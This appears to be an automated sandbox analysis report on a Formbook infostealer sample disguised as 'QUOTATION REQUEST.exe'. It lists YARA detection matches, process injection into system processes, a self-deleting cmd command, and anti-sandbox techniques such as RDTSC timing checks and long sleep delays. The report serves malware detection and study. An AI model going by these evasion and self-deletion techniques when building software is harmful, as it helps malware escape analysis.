Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B03DA	9_2_036B03DA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BDBD2	9_2_036BDBD2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362EBB0	9_2_0362EBB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AFA2B	9_2_036AFA2B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C22AE	9_2_036C22AE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120	9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FF900	9_2_035FF900
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036CE824	9_2_036CE824
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1002	9_2_036B1002
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C28EC	9_2_036C28EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0	9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C20A8	9_2_036C20A8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360B090	9_2_0360B090
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C1FF1	9_2_036C1FF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036CDFCE	9_2_036CDFCE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03616E30	9_2_03616E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BD616	9_2_036BD616
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C2EF7	9_2_036C2EF7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C1D55	9_2_036C1D55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C2D07	9_2_036C2D07
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F0D20	9_2_035F0D20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360D5E0	9_2_0360D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C25DD	9_2_036C25DD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622581	9_2_03622581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BD466	9_2_036BD466
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360841F	9_2_0360841F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EECB85	9_2_00EECB85
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB4A6	9_2_00EEB4A6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB4A3	9_2_00EEB4A3
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00ED8C60	9_2_00ED8C60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00ED8C5D	9_2_00ED8C5D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEC58C	9_2_00EEC58C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00ED2D90	9_2_00ED2D90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEBD74	9_2_00EEBD74
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00ED2FB0	9_2_00ED2FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EECF94	9_2_00EECF94

Source: C:\Windows\SysWOW64\wlanext.exe

Code function: String function: 035FB150 appears 45 times

Source: QUOTATION REQUEST.exe, 00000000.00000002.233827964.00000000059E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.227364139.00000000002E8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000003.00000000.224914371.0000000000CF8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000003.00000002.269766089.0000000001A52000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamewlanext.exej% vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe	Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe

Source: QUOTATION REQUEST.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: QUOTATION REQUEST.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@15/6

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION REQUEST.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01

Source: QUOTATION REQUEST.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: QUOTATION REQUEST.exe	Virustotal: Detection: 18%
Source: QUOTATION REQUEST.exe	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: QUOTATION REQUEST.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION REQUEST.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe
Source:	Binary string: wlanext.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_002394E5 push cs; iretd	0_2_002394E6
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041C93F pushad ; ret	3_2_0041C943
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041C9F4 push 1B579E0Eh; ret	3_2_0041CA15
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00415249 push ebx; iretd	3_2_0041524C
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004152D2 push 59027665h; retf	3_2_004152E2
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00413348 push ds; iretd	3_2_00413349
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B3B5 push eax; ret	3_2_0041B408
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0040D441 push EB161335h; ret	3_2_0040D446
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B46C push eax; ret	3_2_0041B472
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B402 push eax; ret	3_2_0041B408
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B40B push eax; ret	3_2_0041B472
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B499 push eax; ret	3_2_0041B472
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B499 push eax; ret	3_2_0041B472
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00C494E5 push cs; iretd	3_2_00C494E6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0364D0D1 push ecx; ret	9_2_0364D0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEC9F4 push 1B579E0Eh; ret	9_2_00EECA15
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEC93F pushad ; ret	9_2_00EEC943
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE52D2 push 59027665h; retf	9_2_00EE52E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE5249 push ebx; iretd	9_2_00EE524C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB3B5 push eax; ret	9_2_00EEB408
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE3348 push ds; iretd	9_2_00EE3349
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB499 push eax; ret	9_2_00EEB472
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB499 push eax; ret	9_2_00EEB472
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB46C push eax; ret	9_2_00EEB472
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EDD441 push EB161335h; ret	9_2_00EDD446
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB40B push eax; ret	9_2_00EEB472
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB402 push eax; ret	9_2_00EEB408

Source: initial sample

Static PE information: section name: .text entropy: 7.93143837904

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION REQUEST.exe PID: 4660, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 0000000000ED85E4 second address: 0000000000ED85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 0000000000ED897E second address: 0000000000ED8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Code function: 3_2_004088B0 rdtsc

3_2_004088B0

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 5296	Thread sleep time: -103583s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 3440	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4156	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 4644	Thread sleep time: -52000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Thread delayed: delay time: 103583			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000005.00000000.252971907.0000000008907000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: explorer.exe, 00000005.00000000.256483067.000000000F540000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
